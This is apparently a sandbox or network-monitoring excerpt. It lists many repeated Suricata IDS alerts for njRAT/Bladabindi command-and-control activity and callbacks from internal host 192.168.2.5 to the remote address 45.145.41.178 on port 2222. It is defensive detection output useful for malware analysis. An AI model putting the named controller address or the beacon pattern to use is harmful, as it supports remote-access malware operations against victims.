Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53983 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53989 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53987 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53990 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53988 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53986 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53984 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53997 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54002 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54004 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53995 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53992 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54000 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53993 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54008 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53991 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53994 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54013 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53996 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:53998 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54009 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:53999 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54006 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54020 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54011 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54003 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54023 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54007 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54015 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54025 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54019 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54014 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54012 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54001 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54026 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54022 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54030 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54021 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54031 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54028 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54016 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54005 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54024 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54035 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54018 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54041 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54042 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54036 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54039 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54017 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54043 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:54045 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54027 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54034 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54037 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54048 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54032 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2814860 - Severity 1 - ETPRO MALWARE njRAT/Bladabindi CnC Callback (act) : 192.168.2.5:54033 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826105 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (li) : 192.168.2.5:54047 -> 45.145.41.178:2222
Source: Network traffic	Suricata IDS: 2826107 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (infn) : 192.168.2.5:54047 -> 45.145.41.178:2222
